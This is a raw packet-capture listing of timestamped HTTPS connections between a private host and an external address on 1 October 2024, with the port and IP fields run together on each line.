                                                Oct 1, 2024 11:12:02.971870899 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.971877098 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.985234022 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.057245970 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.057291031 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.057352066 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.057374954 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.057703018 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.057756901 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.058212042 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.058219910 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.058320045 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.058362961 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.058604956 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.058654070 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.059215069 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.059221983 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.062306881 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.062349081 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.064280033 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.064289093 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.065290928 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.065294981 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.070357084 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.080384970 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.080389977 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.110631943 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.144769907 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.144815922 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.145664930 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.145682096 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.149364948 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.149411917 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.149564981 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.149605989 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.149976015 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.151786089 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.151797056 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.151860952 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.151901960 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.151959896 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.152852058 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.152859926 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.156446934 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.156451941 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.157202005 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.165963888 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.165966988 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.165976048 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.169574022 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.169579029 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.191764116 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.232682943 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.232743979 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.232762098 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.232780933 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.233329058 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.236967087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237020016 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237509966 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237559080 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237651110 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.237659931 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237709999 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237749100 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237865925 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.237911940 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.238071918 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.238400936 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.238409996 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.242054939 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.242059946 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.242784023 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.251513004 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.251517057 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.255032063 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.272927999 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.320775032 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.320842028 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.320873976 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.320883036 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.321393967 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.324698925 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.324739933 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.324858904 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.324903965 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.325368881 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.325407028 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.325531960 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.325577021 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.325767994 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.325774908 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.326004028 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.326507092 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.326513052 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.330034018 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.339323997 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.339332104 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.342820883 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.360603094 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.408864975 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.408925056 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.408973932 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.409003019 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.409563065 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.412379980 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.412422895 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.412636042 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.412684917 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.412945032 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.412986040 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.413162947 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.413259983 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.414149046 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.414160967 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.414856911 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.414860964 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.418431997 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.427670956 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.427674055 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.427681923 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.431238890 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.431242943 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.448652029 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.496377945 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.496436119 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.496455908 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.496464968 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.496896029 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.500085115 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500125885 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500250101 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500298977 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500627995 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500667095 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500796080 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.500803947 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500865936 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.500926971 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.501082897 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.501120090 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.501476049 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.501482964 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.504741907 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.513303041 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.513305902 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.517144918 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.533468008 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.583949089 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.584032059 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.584049940 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.584073067 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.584646940 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.587766886 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.587810040 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.587971926 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588021040 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588185072 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588223934 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588603020 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588696957 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588809013 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.588816881 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588897943 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.588937044 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.589107037 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.589529991 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.589538097 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.595237017 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.604331017 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.604336023 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.607805014 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.623852968 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.671646118 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.671713114 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.675667048 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.675714016 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.676173925 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.687423944 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.715425968 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.715444088 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.722116947 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.722121954 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.722752094 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.726345062 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.726349115 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.726357937 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.729652882 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.729656935 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.729666948 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.730453014 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.730457067 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.733773947 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.755251884 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.755256891 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.759512901 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.759577990 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.759582996 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.760504007 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.763242960 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.764866114 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.785774946 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.785780907 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.785795927 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.790052891 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.790057898 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.791091919 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.791095018 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.795114040 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.812310934 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.812318087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.812338114 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.816726923 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.816734076 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.817586899 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.817590952 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.821923018 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.848164082 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.848169088 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.850748062 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.852230072 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.852236032 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.853271961 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.853276968 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.857646942 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.878251076 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.878257036 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.878273010 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.882458925 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.882467985 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.883399963 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.883404016 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.887531042 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.903353930 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.903363943 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.903373957 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.907464027 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.907470942 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.908412933 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.935028076 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.935086966 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.935107946 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.938524961 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.938574076 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.939615965 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.939624071 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.940591097 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.940601110 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.945169926 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.968385935 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.968399048 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.968421936 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.972721100 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.972728968 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.973728895 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:03.973732948 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:03.978477001 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.002511978 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.002528906 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.002542019 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.007605076 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.007621050 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.022929907 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.022957087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.024646044 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.024661064 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.025664091 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.045717001 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.045739889 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.050899982 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.050906897 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.050915003 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.051929951 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.051934958 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.057061911 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.077426910 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.077430964 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.077441931 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.082417965 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.082423925 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.083487034 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.083493948 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.083501101 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.088233948 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.119452000 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.119458914 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.124403954 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.124408007 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.124414921 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.125659943 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.155657053 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.155662060 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.155683041 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.160608053 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.160614014 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.161570072 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.161572933 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.166148901 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.191481113 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.191488028 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.191497087 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.196724892 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.196732998 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.196741104 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.197761059 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.228434086 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.228466034 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.233489990 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.233498096 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.233505964 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.234752893 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.234759092 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.239612103 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.255369902 CEST42836443192.168.2.2391.189.91.43
                                                Oct 1, 2024 11:12:04.265479088 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.265497923 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.265515089 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.270252943 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.270262003 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.271183014 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.271189928 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.276141882 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.295252085 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.295263052 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.300600052 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.300607920 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.300617933 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.301656961 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.301662922 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.306783915 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.336373091 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.336380959 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.336404085 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.341032982 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.341042042 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.342089891 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.342094898 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:04.346756935 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.371135950 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:04.371145010 CEST4433807692.60.39.208192.168.2.23
